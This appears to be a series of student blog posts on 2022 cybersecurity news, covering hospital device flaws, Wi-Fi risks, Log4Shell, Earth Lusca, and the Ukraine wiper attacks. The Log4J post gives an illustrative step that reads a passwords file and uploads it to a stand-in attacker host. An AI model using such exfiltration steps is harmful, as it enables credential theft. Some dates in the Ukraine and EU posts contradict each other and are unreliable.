Introduction

It’s been recently reported that over half of medical devices have critical security vulnerabilities. (Cynerio, Jan 19, 2022) Healthcare organizations are an easy target for cyberattacks due to their weak defenses, and something must be done about it for the safety of the public.

Why is this a big issue?

Hackers are becoming increasingly successful in breaching healthcare organizations’ data and this problem has been running rampant for the past few years. These data breaches have huge consequences for everyone.

For example, Maryland’s department of health was hit with a devastating ransomware attack, which gave hospitals a difficult time, especially due to the higher hospitalization rates due to COVID-19. One major consequence of this data breach was that the department couldn’t release their case numbers over the course of a few weeks, hindering their ability to take well-informed action in response to COVID-19 and to notify other states of their case numbers (ZDNet, Jan 12, 2022).

Recent research reveals that ransomware attacks are posing serious threats to healthcare consumers, including increased mortality rates and complications in treatment that often increase recovery time or yield incomplete recoveries.

Some examples of hospital equipment that are especially vulnerable to attacks are:

• IV pumps, 73% of which possess a serious vulnerability that can threaten patient safety, leak confidential data, or limit the accessibility of the pump itself in the case that is targeted in an attack (Cynerio, Jan 19, 2022).
• Any devices using versions older than Windows 10, which make up the majority of the devices in a multitude of healthcare departments. This presents potential danger to patients connected to any of these devices (Cynerio, Jan 19, 2022).

How is this issue being addressed, and what are the challenges in doing so?

According to an article by Cynerio on January 19, 2022, the use of network segmentation is sufficient to prevent over 90% of the security dangers associated with medical devices in hospitals, and is the most effective method in doing so. However, this article does not mention the logistics of such an implementation in terms of time or money.

Another strategy for improving the security of data in hospitals is to have up-to-date software. The old software that is still in use in many healthcare organizations presents a significant variety of shortcomings in regards to protecting against cyberattacks. This could be improved upon by these organizations by updating to more recent and higher quality software. This proves to be a strikingly difficult challenge, however, as investing in an area such as this does not produce revenue for the organization.

Further, any attempt made by healthcare organizations to predict the cost-effectiveness of upgrading software appears to be a fruitless effort, as technology has been evolving far too rapidly for there to be any significant historical evidence to inform such a decision. 

Yet another struggle for hospitals is the lack of individuals with expertise in the field of cybersecurity working in healthcare. For example, only 21% of hospitals had a dedicated security executive in 2019, yet only 6% were identified to be a Chief Information Security Officer. There is a significant rush for hospitals to hire cybersecurity professionals, which is leading to such high demand that cybersecurity companies are providing hospitals with a growing array of services (Black Book Research, Nov 4, 2019).

Due to this lack of knowledge, healthcare organizations remain unaware of which solutions exist, let alone have the knowledge necessary to know which ones are best suited for them. An additional result of this is that hospitals are unable to put in their due diligence for testing their cybersecurity systems, thus causing them to deal with attacks retroactively rather than proactively.

What does the future of cybersecurity in healthcare look like?

Over the past few years, healthcare organizations have become increasingly aware of the dangers associated with cyberattacks, so it is becoming increasingly common for them to set concrete goals in terms of cybersecurity (Black Book Research, Nov 4, 2019). This will allow them to attain measurable results and assess their ability to protect themselves against cyberattacks. The vast majority of healthcare organizations predict a foreseeable increase in cyberattacks against them in the future, thus giving them a good reason to improve upon their existing systems. Alas, we can only hope that in the future, healthcare organizations will choose to pay more attention to the security of their data so they are better enabled to save more lives.

Key Takeaways

Healthcare organizations have been a very common target for cyberattacks in recent years, and this danger’s presence is only projected to increase in the coming years. This happens for a multitude of reasons, most of which lie in the inability of healthcare organizations to address such issues and a lack of experience with attacks of this nature in the ever-evolving digital landscape. Hopefully, they will be able to find effective security solutions in the coming years as the attacks inevitably continue.

References

• https://www.zdnet.com/article/more-than-half-of-medical-devices-have-critical-vulnerabilities/
• https://www.cynerio.com/blog/cynerio-research-finds-critical-medical-device-risks-continue-to-threaten-hospital-security-and-patient-safety
• https://www.zdnet.com/article/maryland-officials-confirm-ransomware-attack-shut-down-department-of-health/
• https://blackbookmarketresearch.newswire.com/news/healthcare-data-breaches-costs-industry-4-billion-by-years-end-2020-21027640
• https://www.businesswire.com/news/home/20210922005436/en/New-Ponemon-Institute-Research-Shows-Ransomware-Attacks-on-Healthcare-Delivery-Organizations-Can-Lead-to-Increased-Mortality-Rate

Public Wi-Fi networks are becoming more and more abundant. Recent reports show that there are over 410,000 public Wi-Fi networks in the United States^[1]. While this is a good thing for the general public, it is also a good thing for malicious hackers. There is no guarantee that the Wi-Fi hotspot you are using is secure, and this creates a gold mine for hackers who want to take advantage of this.

Some of the many risks associated with public hotspots:

• Not paying attention– Some people just assume that the hotspot they are connected to is secure, and this makes them more susceptible to malicious hackers^[2].
• Lack of encryption– Countless Wi-Fi hotspots lack sufficient encryption and in some cases, have no encryption at all. This makes the Wi-Fi hotspots very susceptible to hackers breaking in and stealing people’s information^[2].
• Lack of password protection– A lot of public hotspots lack secure passwords, and some lack passwords at all. This makes it effortless for hackers to gain access to the network and hack into your data^[2].

My personal experience with public Wi-Fi networks

I have never had my data leaked while using a public hotspot, knock on wood, but that is because I have always taken extra precautions when using these networks. For one, I have never and will never use online banking in a public hotspot. That would be like inviting a hacker to access my bank account. You can never know for sure that a public hotspot is secure, it is my opinion that it is unwise to access any sensitive or private data on these networks. Stuff like Instagram, Facebook, and the likes are all fine, but something like bank statements or government records would not be a good idea.

How the government is keeping public hotspots secure

Governments around the world have begun to impose rules for these networks to keep them secure^[1]. One of these rules is what I will be focusing on, and that is DNS filtering.

DNS filtering

DNS filtering is a great way to protect users in public hotspots. DNS filtering acts as a barrier or second layer of protection from hackers. This works by preventing the threats from ever reaching your device. DNS filtering prevents connections to shady or unsecure websites that might try to steal your data. Another feature of this is that the business or whoever owns and controls the public hotspot can choose what websites to block. For example, they can block pornographic websites, websites that involve violence, etc. to create a safer environment.

VPN

Another way to make these public networks secure, would be to use a VPN. Although in my opinion this is not very practical. Only the user who has the VPN is protected and not the whole network, so multiple VPNs would be required. With the sheer amount of public hotspots, and the many more users who access those hotspots, having that many VPNs is not feasible on a large scale. A VPN works by creating a private secure connection with the network, and this can encrypt whatever data you access. However, this is a good option if you want to have extra protection for yourself, but you have to take into account that most VPN services come with a monthly fee.

Final thoughts

Public Wi-Fi networks have come a long way in the past 10 years, but they now must focus on the issue of security. Public Wi-Fi networks are not always secure, so it is better to play it safe than to get “pwned”. I will continue to exercise caution when I access these public networks and I strongly advise you to do the same.

Sources:

1. https://thehackernews.com/2022/01/dont-use-public-wi-fi-without-dns.html 
2. https://www.perimeter81.com/blog/wi-fi/public-wi-fi-risks-protect-your-clients 
3. https://blog.vpncity.com/how-to-stay-safe-on-public-wifi-with-vpn/ 

Report says, Team USA athletes heading to Beijing for the Olympic games have been advised to leave their personal phones to avoid being tracked while or after the Olympic games and are being encouraged to use burner phones while they there.

This really makes me wonder, with how far we have come using smart mobile devices, smart security systems for our homes, etc. If corporations or the government decide that they want to track us, is there really a way to avoid it? Do we go back to using archaic means of communication? Do we stop using the technology that has been developed?

Measures like the ones that have been advised to Team USA will cause discomfort, it might not be a lot but the discomfort is there. Although, they tried to find a solution to this by advising the athletes to use burner phones instead, It makes it difficult to talk to their families who are not going to be allowed to travel with them to Beijing due to COVID-19 protocol. It also does not allow them to make posts to social media which could be important for them as they will want to show the world that they won a medal as soon as possible but can not and have to wait until the end of the Olympics and go back home.

With all the technological developments that have been made and how they work, the only solution to protecting our privacy will be similar to those that the athletes have been advised to take, using older forms of technology. For some people, using older forms of technology will not be a big deal, but for a lot of people that depend on technology a lot, it will affect how they go about a lot.

Smart Security

Lots of people use smart security in their homes. They have cameras at their front doors, in their homes, Locks that are connected by networks and so much more. These cameras are connected to networks and these networks can be tapped. Changing security systems and going back to using keys and locks may not prove difficult but it does incur cost on the owner.

Televisions and Entertainment

Lots of speakers and TVs now have in built in microphones in them that listen for you to give them instructions. These are usually connected to the internet as well and are possibly always listening except, perhaps, they are unplugged. Using older TVs and other forms of entertainment should not create a big deal but it depends on the person that we’re talking about and how much that person depended on these systems.

Smartphones

Our phones are devices we carry about everywhere and where we probably keep a lot of our information on. It is probably an extremely efficient way of watching people, you basically monitor their every move. Using Burner phones like the way the USA athletes have been advised to do will actually change the way of life for a lot of people because I believe that a lot of the world’s population depend on their smartphones a lot.

References

1. https://www.cnet.com/news/team-usa-reportedly-tells-athletes-not-to-take-their-phones-to-winter-olympics/
2. https://www.eff.org/issues/privacy

“Privacy is dead, and social media holds the smoking gun.”

– Pete Cashmore, CEO of Mashable⁴

Social media platform Facebook has been involved in controversy after controversy throughout its lifetime, which has many people questioning the ethical practices that Facebook continues to do today. I think that the quote above is an important realization about Facebook and other platforms, that daily users are not paying enough attention to. Exploitation of millions of users’ personal data for market dominance worldwide is a very significant issue that should not be taken lightly by anyone, as privacy is a right that a human being should have at all times.

The Lawsuit

On January 14, 2022, Meta⁶ got sued in the UK for £2.3 billion (roughly $3.92 billion CAD) in a class action lawsuit. According to the lawsuit, Facebook has set an unfair expectation upon its users, by handing over users’ personal data, without giving them adequate compensation for stealing said data.¹ Covering the time period of October 1, 2015 to December 31, 2019, legal experts have claimed that more than 44 million users’ personal data have been exploited for Facebook’s personal gain.² Legal experts also state that since Facebook is abusing their power unfairly, Facebook could have to pay £50 (roughly $85.1 CAD) to every UK user.³

In the UK, there has not been a claim like this ever against Facebook, as it is the dominant social media platform for people to communicate and connect with family, friends and coworkers. This allows Facebook to have market dominance with users’ data, which caused some UK users to realize the dark side of Facebook’s policies. Following this, a Meta spokesperson spoke about the matter in the following quote.

“People access our service for free. They choose our services because we deliver value for them and they have meaningful control of what information they share on Meta’s platforms and who with. We have invested heavily to create tools that allow them to do so.”

Meta Spokesperson¹

My Personal Thoughts

I have never been the biggest user of social media in the first place, but I used to have a Facebook account where I would communicate with mainly family. After some time though, I discovered about some of the information that Facebook had on me, which shocked me to say the least. I think this lawsuit should help raise even more awareness about privacy, to the UK users who use Facebook on the daily, they should question whether they want to continue using Facebook going forward.

I also think that this affects social media platforms such as Instagram and WhatsApp, which are owned by Facebook, so that hopefully more people are aware about what happens as they continue to be users. Most people typically would not read through the entire terms and conditions when creating an account, but if people were more aware about the amount of data Facebook is obtaining, their privacy could be saved.

References:

1. Milmo, D. (2022, January 14). Meta sued for £2.3bn over claim Facebook users in UK were exploited. The Guardian. Retrieved January 19, 2022, from https://www.theguardian.com/technology/2022/jan/14/meta-sued-for-23bn-over-claim-facebook-users-in-uk-were-exploited
2. PYMNTS.com. (2022, January 17). UK lawsuit claims Facebook Exploited user data. PYMNTS.com. Retrieved January 19, 2022, from https://www.pymnts.com/legal/2022/uk-lawsuit-claims-facebook-exploited-personal-data-of-44-million-users/
3. Landi, M. (2022, January 15). Every UK facebook user could get £50 as lawsuit filed against social media giant. mirror. Retrieved January 19, 2022, from https://www.mirror.co.uk/news/uk-news/every-uk-facebook-user-could-25954863
4. Dispatch. (2019, May 15). Holding the smoking gun. The NYU Dispatch. Retrieved January 19, 2022, from https://wp.nyu.edu/dispatch/2019/05/15/holding-the-smoking-gun/#:~:text=As%20Mashable%20CEO%2C%20Pete%20Cashmore,media%20hold%20the%20smoking%20gun.%E2%80%9D&text=As%20startup%20entrepreneur%20David%20Alston,looking%20for%20the%20best%20deals.
5. Newton, C. (2020, July 30). Facebook usage and revenue continue to grow as the pandemic rages on. The Verge. Retrieved January 19, 2022, from https://www.theverge.com/2020/7/30/21348308/facebook-earnings-q2-2020-pandemic-revenue-usage-growth
6. The Facebook Company is now Meta. Meta. (2021, November 23). Retrieved January 19, 2022, from https://about.fb.com/news/2021/10/facebook-company-is-now-meta/
7. Hern, A. (2020, February 16). Internet privacy: The apps that protect you from your apps. The Guardian. Retrieved January 19, 2022, from https://www.theguardian.com/technology/2020/feb/16/internet-privacy-settings-apps-to-protect-you-

On Wednesday, January 19th, President Biden has expanded on the NSA’s (National Security Agency) responsibilities and scope in protecting the US government’s computer networks.

National Security Agency headquarters in Fort Meade, Md. The NSA has sought to expand its cybersecurity mission.

PHOTO: SAIT SERKAN GURBUZ/REUTERS

---

To those who unfamiliar with the NSA, the NSA is a national security agency of the U.S. Department of Defence that is responsible for information monitoring & processing for global threats, the handling & collection of domestic and foreign intelligence through interception, encryption, and decryption, and in turn is tasked with the protection of U.S. information systems & communication networks.

With this memorandum signed by President Biden, the NSA is now able to require all operators of national security systems such as the FBI, CIA, US Department of Defense and other US intelligence agencies to all implement baseline cybersecurity practices. Such practices include two-factor authentication and standard use of encryption. Effectively, all US national security agencies now have to be aligned in basic cyber security standards.

In addition, all cyber incidents that involve any U.S. agency that deals with “security” will now have to be reported to the NSA, which would further aid the U.S. government in identifying and mitigating cybersecurity threats across all national security systems among all of its branches. This will in turn require all US defence and intelligence agencies to secure any tools used to share data amounts amongst other whether if it is classified or not.

---

Historically, the U.S. government has been plagued by cyber attacks from other foreign powers such as China & Russia and tensions have only grown over the years. With this new mandate, the NSA is effectively now held responsible to ensure that all US agencies dealing with national defence are held up to an acceptable standard.

The U.S. has multiple areas of expertise where they may hold a technological advantage over other nations, one example would be military technologies. However with multiple cyber security breaches by China & Russia over the years, the it has been repeatedly proven that the U.S. is vulnerable cyberattacks by foreign actors. One example of a cybersecurity breach was the theft of data related to the F-35 program, which China used to develop their own indigenous stealth fighter, the J-20 & J-31.

With current political tensions, the U.S. now seeks to augment its cybersecurity practices, especially in regards to having a baseline minimum for all departments dealing with sensitive information to follow, and is effectively granting the NSA more responsibility and power by holding the NSA accountable to make sure that all agencies follow the same cyber security practices. From a perspective of national defence, this memorandum makes sense as it looks to align basic cybersecurity practices among all US security departments. However, it looks like the NSA has even more power and legal oversight on how they can collect information by having all security departments report to them. My question to everyone is if this should this be something of concern to everyday citizens? Or does national security take precedence by allowing the NSA, a U.S. department notorious on spying on its citizens greater power?

---

Sources:

https://www.wsj.com/articles/biden-to-expand-national-security-agency-role-in-government-cybersecurity-11642604412?mod=lead_feature_below_a_pos1

https://www.nsa.gov/about/mission/index.shtml

https://www.19fortyfive.com/2021/07/how-china-stole-the-designs-for-the-f-35-stealth-fighter/

Who is “Earth Lusca” and what is their motivation?

Earth Lusca is a Chinese-based cyber-espionage group that has been very active in recent years. Their main motivation is spying and gaining intelligence information from government and private institutions worldwide. It has been rumored that they spy on other governments and institutions for the benefit of the Chinese government but these rumors remain uncertain as they have also been associated with purely financially-motivated attacks against Chinese companies. 

When looking at some of the attacks that were withheld, the rumors of working with the Chinese government make sense. A list of the institutions and organizations they organized these attacks against include¹:

• Government institutions in Taiwan, Thailand, Philippines, Vietnam, United Arab Emirates, Mongolia, and Nigeria
• Educational institutions in Taiwan, Hong Kong, Japan, and France
• News media in Taiwan, Hong Kong, Australia, Germany, and France
• Pro-democracy and human rights political organizations and movements in Hong Kong
• Covid-19 research organizations in the United States
• Telecom companies in Nepal
• Religious movements that are banned in Mainland China

I think it’s rather worrying that this group continues to undertake these attacks world-wide with no apparent consequences. This has been going on for the past few years!

I also think it’s quite interesting to note that in the recent past it has almost become a trend for government espionage groups to take part in financially-motivated attacks. Some examples include² Rocket Kitten (Iran), Lazarus Group (North Korea), and UGNazi. 

How are the attacks being operated?

As it can be seen in the above diagram, there are two pathways that the group operates on. The bottom pathway relies on virtual private servers (VPS) that push out watering hole and spear phishing operations to victims’ computers. Once victims’ computers are compromised by malware, this pathway is also used as a command-and-control server (C&C callback) to gain complete control of victims’ computers. 

The top pathway in the diagram also acts as a C&C server. It also serves another function of searching a victims’ computer for loopholes, vulnerabilities and building tunnels within the victims’ network (EarthWorm tunneling). 

To emphasize on the technicalities, some of the malwares Earth Lusca use include⁴:

• Doraemon backdoor
• FunnySwitch backdoor
• ShadowPad backdoor
• Winnti malware
• AntSword web shell
• Behinder web shell

How can the attacks be minimized or even stopped?

Funny enough, researchers suggest that by simply avoiding clicking on links in emails/websites from unknown sources and updating applications regularly, this can significantly minimize these attacks or even completely stop them. I think it’s crazy (and funny) to think that governments and high-value organizations, who constantly advise the public about the importance of cyber security, are getting attacked and hacked this easily. Advanced cyber security tools such as “Trend Micro XDR” can also be used by big organizations to provide maximum protection against such groups. According to Trend Micro’s technical analysis on Earth Lusca, these tools work by “collecting and correlating activity data across multiple vectors — from emails and endpoints to servers, cloud workloads, and networks — enabling a layer of security detection and investigation that cannot be matched by traditional security solutions.”⁵

On a final note, I would like to share my opinion on organizations and how they handle/talk about cyber security. I think that most companies and governments in the recent years have raised awareness to the general public about the importance of cyber security and have started applying advanced and modern tools of cyber protection. However, I think the topic is still not taken seriously by many and some companies are also not very transparent about the whole process. Cybersecurity failure is one of the main risks that face the entire world in the short-term and medium-term and should be treated according to its magnitude. (The Global Risks Report)

References: 

1. https://therecord.media/earth-lusca-threat-actor-targets-governments-and-cryptocurrency-companies-alike/ (list of institutions)
2. https://en.wikipedia.org/wiki/List_of_hacker_groups (hacker groups)
3. https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf (pathways image, Trend Micro’s Analysis of Earth Lusca’s Operations, Page 2 Figure 2)
4. https://www.bankinfosecurity.com/new-chinese-threat-group-conducts-espionage-theft-a-18336 (list of malwares)
5. https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf (page 28: conclusion)
6. https://www.trendmicro.com/en_id/research/22/a/earth-lusca-sophisticated-infrastructure-varied-tools-and-techni.html
7. https://www3.weforum.org/docs/WEF_The_Global_Risks_Report_2021.pdf (the global risks report)

What is Log4J?

Log4J or Apache Log4J is a Java library that offers utility in logging. Logging is the recording of activity by an application. Logging is very useful in determining what your application is doing and increasing the understanding of the application. The most general use case is to catch errors in a try catch clause or another Exception handling method. Log4J is extremely popular, with close to 30 million in downloads in the last 4 months alone^[5]. Over 7000 open-source projects have Log4J as a dependency.

What is the vulnerability?

When using Log4J (or any logger), when an error occurs, data is sent to servers, databases, etc of the program with the intended error information or logged information. Attackers intentionally caused errors but instead of just sending the logged data they also sent a malicious payload that resulted in a code injection. This resulted in a remote code execution. An example of the execution could be “read file ‘/naveed/supersecretpasswords’, upload https://getpwned.ru”, where my passwords file could be uploaded to the internet. The range of the remote code execution is unlimited.

The most common form of the exploit has been utilizing the JNDI Interface which looks up objects, detects changes, and binds remote objects. Hackers were able to use their own LDAP server to send the malicious payload through the JNDI Interface.

The malicious payload is then executed within the Application and the exploit begins. There have been commonalities in what types of attacks are used through the payload. These include RAT infestations (Meterpreter, Blandabindi, and HabitsRAT), DDoS attacks (Webtoos Malware), Obfuscated HTTP requests, coin-miners, Cobalt Strike, and many more^[2]!

Who has been affected and how widespread is the Vulnerability?

Since the vulnerabilities public disclosure on December 10^th, 2021, over 44% of corporate networks have been attacked. Cloudflare’s CEO tweeted in early December that they have seen over 400 exploit attempts per second (you are seeing that right, per second) on its network. The most devastating of exploits send malware through the return data. Large corporations and institutions have been attacked such as Microsoft and University servers aimed at gaining industry secrets. Several Countries are involved as well. Chinese, and Iranian hacker groups have been identified as contributing to attacks and further development of the Log4J Exploit. The effects of the exploit do not end after packages have been fixed and the exploit patched. Hackers have been using the exploit to further increase the vulnerability of applications and servers by inserting their own exploits to use at another time.

Has the Log4J exploit been fixed?

In short, no, the exploit has not been fixed. Of the 500 identified packages dependent on Log4J, 187 of them have fixed the exploit and 314 have not currently. While there have been several patches and remedies, there has not been a significant update to the Maven Central repository. The vulnerability is several layers deep for over 80% of the packages used. This requires a complete rework of the inner workings of the packages as most of the packages are over 5 level deep in their Log4J implementation^[3]. Since December a massive effort by open-source contributors has resulted in over 13% of have been fixed and the ongoing effort continues^[3]. Microsoft has come out with a statement that the Log4J exploit will last several years, and this sentiment has been agreed upon by several experts in the field.

Code Examples of Exploit Implementation:

Inside the code: How the Log4Shell exploit works

Questions for Students

1. Have you used a Logger package before?
2. Have you been affected in any way? (New Patches you have had to install, Minecraft Servers down, etc)

References

(1) https://logging.apache.org/log4j/2.x/security.html
(2) https://threatpost.com/microsoft-rampant-log4j-exploits-testing/177358/
(3) https://security.googleblog.com/2021/12/understanding-impact-of-apache-log4j.html

(4) https://cyber.gc.ca/en/alerts/active-exploitation-apache-log4j-vulnerability

(5) https://blog.sonatype.com/why-did-log4shell-set-the-internet-on-fire#:~:text=log4j%2Dcore%20is%20the%20top,total%20population%20of%207.1%20million.

(6) https://sysdig.com/blog/exploit-detect-mitigate-log4j-cve/

(7) https://snyk.io/blog/log4j-rce-log4shell-vulnerability-cve-2021-44228/

            On Friday January 15^th 2022, the EU initiated a six-week stress test of its member state’s cybersecurity. According to Bloomberg.com, the purpose of these tests was to strengthen the EU’s preparedness for incoming attacks, as well as increase cooperation and coordination of member states. In the first simulation, a cybersecurity incident is discovered in a fake major Finnish power company. Due to the interconnectedness of this power company’s systems with other Finnish national and international systems, this simulation required intensive cooperation between EU member states. The response force was responsible for determining the origin of the crisis, determining the potential impact, and doing anything possible to limit the scope of the issue. This is the largest stress test of its kind; the EU will likely use this test to develop a framework for a joint response to future major incidents (infosecurity-magazine).

Cyberattacks are on the rise

            The global pandemic has created an environment for cyberattacks to flourish. During the first year of the pandemic, cyberattacks doubled in Europe (cnn) and attacks on Canadian hospitals alone increased by 250% (yahoo finance). This included one of Canada’s worst cyberattacks in history, which caused extreme disruptions to the health care system in Newfoundland and Labrador (cbc). This attack, like many other attacks on hospitals, are ransomware attacks, where malicious actors take health data hostage, encrypt it, and then only release the encryption key if a ransom is paid. These attacks have costed Canada millions of dollars; the Communications Security Establishment (CSE) estimates that the average cost of a data breach is $6.35-million (globe and mail). The attacks have also caused a massive disruption in health care faculties during the pandemic (cbc).

Canada’s preparedness strategy

            Canada has outlined its National Cyber Security Strategy on its website, which includes a multifaceted approach to prevention and preparedness. However, this not mean that Canadians are necessarily well protected. According to the financial post, more than half of Canadian businesses rarely or never conduct cyber penetration tests. The Canadian government does do stress tests on critical components (driving.ca), however the scope of these tests is not public knowledge as far as I am aware. Additionally, I could not find any public information on international strategies that Canada has developed with other nations to handle major cyberattacks.

Should Canada follow the EU’s steps in joint preparedness?

            As cyberattacks are becoming more and more prevalent, I believe that creating frameworks to handle major cyberattacks will become necessary. The EU is taking an important step in determining the best ways to not only prevent these attacks, but also how to mitigate the damage when they do occur. I believe that these frameworks need to be international, but also interprovincial for Canada. With how linked all of our government systems are, a single-entry point could cause massive damage, as we saw in the Newfoundland-Labrador hospital attack. While prevention is clearly the most efficient option, being prepared to mitigate the damage is also an extremely important thing to consider.

References

https://www.bloomberg.com/news/articles/2022-01-15/eu-targets-fictitious-finnish-power-company-in-cyberattack-test

https://www.infosecurity-magazine.com/news/eu-supply-chain-attack-simulation/

https://www.cnn.com/2021/06/10/tech/europe-cyberattacks-ransomware-cmd-intl/index.html

https://ca.finance.yahoo.com/news/healthcare-sector-sees-250-spike-in-cyberattacks-134754354.html?guccounter=1&guce_referrer=aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS8&guce_referrer_sig=AQAAABpd9jCTH7RpuFymznurUtfu2DFRQiBUuB1hbsKzYXJRsFxhKoAz36t0ahkbbjdj78KDDA7lY_apNb-pz02Nx4klyKhdE5r8H2cjbd-AosP09Ze0cVL66HagG45m1Jck7qia11_VlVHV7BMoZ62OePklnnbfkdX7tfCdkevXrtDR

https://www.theglobeandmail.com/business/adv/article-protecting-yourself-in-the-new-era-of-cybercrime/

https://www.cbc.ca/news/canada/newfoundland-labrador/nl-cyber-attack-worst-canada-1.6236210

https://www.publicsafety.gc.ca/cnt/rsrcs/pblctns/ntnl-cbr-scrt-strtg/index-en.aspx

https://financialpost.com/pmn/press-releases-pmn/business-wire-news-releases-pmn/more-than-half-of-canadian-businesses-rarely-or-never-conduct-regular-penetration-testing

https://driving.ca/car-culture/auto-tech/can-canada-fend-off-a-colonial-pipeline-like-cyberattack

Warfare has been a common theme throughout human history; however, in the 21st century, warfare has shifted from outright hostility and aggression to a more discrete form via the internet. This article will explore how cyberwar is conducted to achieve one’s objectives and its rippling consequences for the victims. 

The War On All Fronts

On January 14, Ukraine experienced a string of cyberattacks that resulted in the collapse of several Ukrainian government’s websites with a warning message that states, “All information about you has become public, be afraid and expect the worst” (Margaret et.al., 2022). Sources suggest that an unknown group initiated the cyber attack with close ties to the Russian government (Margaret et.al., 2022). As such, the news story highlights the uncanny ability of a foreign entity (Russia) to directly attack the government of another country (Ukraine) while maintaining deniability. Not only were they able to extract private information, but they were able to intimidate high-ranking officials without explicit aggression. Similarly, cyber warfare has become a tool for Russia to exert its authority/presence in countries (especially post-soviet states), making even Stalin proud. For instance, Sood and Chaturvedi recently uncovered a malware called ‘Collector-stealer’ whose purpose is to “target European countries, but it also affects users in other countries such as the USA, China, Cambodia and others” (Sood and Chaturvedi, 2021). The virus was found to have Russian origins and utilized phishing and shady downloads to target users (see figure 1). The virus could have devastating effects, primarily when used on government institutions to extract private information via text duplication, window screenshots, and streaming computers remotely (Sood and Chaturvedi, 2021). Moreover, the two examples mentioned above reiterate the theme of cyber warfare, which is to indirectly achieve one’s goal in harming foreign governments and their citizens without direct aggression. 

The Big Influence 

Furthermore, cyber warfare could be used to influence a government through hidden cyber channels or spread propaganda. The key nation-state that has perfected the influence game is the Chinese Communist Party, which has been known to influenced elections, laws, and even politicians (no surprise here!) in western countries (Robert and Chase, 2022). Recently, Canadian Security Intelligence Service (CSIS) issued a statement suggesting China’s attempt at “covertly domesticate relations with elected officers to achieve sway over parliamentary debates and authorities decision-making” (Robert and Chase, 2022). The article emphasizes the use of disinformation campaigns through social media to influence public order and policies in a foreign country. For instance, a report by Washington Post suggests how China purchased Twitter and Facebook social media account for their institutions (police, for instance). These social media accounts then attempted to promote positive views on their glorious leader, spreading misinformation about political candidates/ideologies, thereby furthering domestic polarization (see figure 2), and hiding sensitive information such as the Ughyur genocide (Cate, 2022). When combined, these tools could have devastating effects on the nation and could potentially undermine democracy or social unity through covert influence.

What Can Be Done 

1. Increased funding for cybersecurity agencies (private and government)
2. Pressure Big Tech to increase monitoring on their services
3. Develop new tools to counter foreign cyberattacks and stronger encryption

These strategies could be utilized to limit foreign interference and protect their citizens and institutions from cyber-attacks.

Finally, this article highlighted how cyberwar is conducted to achieve militaristic goals without physical aggression or influence a foreign government to promote policies/laws that are not of interest to their citizens. Also, considering Russia and China are both communist regimes that engage extensively in cyber warfare, it makes one question if Karl Marx should have included a chapter on cyberwarfare in his bestseller Communist Manifesto!

Appendix

Figure 1:  The image above was extracted from Sood and Chaturvedi article (Sood and Chaturvedi, 2021). The images show a keygen capable of cracking Microsoft office. However, upon downloading, the collector-stealer virus is activated, transmitting private data from the user back to the hacker.  

Figure 2: The image above shows a fake Twitter account with a post stating the death related to gun violence in the United States. Currently, the account is suspended due to disinformation. Nonetheless, numerous accounts like these spread false information to further polarization in Western countries. Image extract from BBC article (Carmichael, 2021).

References

Brenna, Margaret, et al. “Ukraine Hit with Cyberattack, a Tactic It ‘Expected’ to Precede a ‘Full Invasion’ by Russia.” CBS News, CBS Interactive, 14 Jan. 2022, https://www.cbsnews.com/news/ukraine-cyber-attack-russia-us-nato-donbas-war-amabssador-markarova/. 

Cadell, Cate. “China Harvests Masses of Data on Western Targets, Documents Show.” The Washington Post, WP Company, 1 Jan. 2022, https://www.washingtonpost.com/national-security/china-harvests-masses-of-data-on-western-targets-documents-show/2021/12/31/3981ce9c-538e-11ec-8927-c396fa861a71_story.html. 

Carmichael, Flora. “How a Fake Network Pushes pro-China Propaganda.” BBC News, BBC, 5 Aug. 2021, https://www.bbc.com/news/world-asia-china-58062630. 

Fife, Robert and Steven, Chase. “Canada’s Spy Agency Warns Mps to Beware of Influence Operations from China.” The Globe and Mail, 11 Jan. 2022, https://www.theglobeandmail.com/politics/article-spy-agency-briefing-mps-to-beware-of-influence-operations-from-china/. 

Sood, Aditya, and Chaturvedi, Rohit. “Collector-Stealer: A Russian Origin Credential and Information Extractor.” The Virus Bulletin, 8 Dec. 2021, https://www.virusbulletin.com/uploads/pdf/magazine/2021/202112-collector-stealer.pdf

January 19^th, 2022 

What Happened This Weekend? 

The year only just began, and of course, a pandemic wasn’t enough. On Saturday January 15^th, 2022, a destructive cyberattack in Ukraine began to rapidly garner national attention (1). The Microsoft Threat Intelligence Center (MSTIC) warned that they had identified destructive malware on computer systems at several Ukrainian government agencies, non-profit organizations, and technology organizations, according to a statement issued by the company (2). Many victim systems of this cyberattack belong to agencies and organizations that work closely with the Ukrainian government to provide critical executive branch and emergency response functions (1, 3). Although the Microsoft warning was only issued on Saturday evening, the destructive malware, capable of wiping data, first appeared on victim systems in Ukraine on Thursday, January 17^th, 2022 (3,4). Further details about the malware were made public in a blog post by the tech giant. According to security specialists at the company, identification of the malware on Thursday, January 17^th, coincided with a global cybersecurity attack on the nights of January 13^th and 14^th, 2022 (2).                          

These attacks targeted Ukrainian government websites, including those belonging to the Ministry of Foreign Affairs and the Ministry of Education (1,3). Furthermore, the company reported that the malware was deceptively designed to resemble ransomware, however, was lacking a ransom recovery mechanism (2). Microsoft further emphasized their belief that the intent of the malware was to ensure that targeted devices became inoperable and destroy data at the hackers’ command (2). In addition to comments issued by Microsoft regarding the attack, the Ukrainian government has also announced that it has gathered evidence suggesting Russian involvement in the cyberattack (3). Ukraine’s Ministry of Digital Development even blatantly remarked that all evidence indicates Russian involvement in the cyberattack (3).                                                     

Despite lengthy statements made by both Microsoft and the Ukrainian government, one question still evades us and that is: who is really behind the attack? Microsoft has thus far, been unable to provide a definitive answer, aside from informing the international community that they have commenced their investigation into the origin of the attacks. Contrastingly, Ukrainian officials have not wasted any time in making their suspicions evident (3). According to Reuters, Ukraine initially suggested that a hacking group associated with Belarus was responsible for the hacks, due to similarities observed in the malware used for this attack and previous cyberattacks (4). Simultaneously however, Ukraine suggested that Russian involvement is undeniable, and that “all evidence indicates that Russia is behind the cyberattack. (1)” Where’s the evidence you ask? To that, Ukraine has no response. 

Digging Deeper

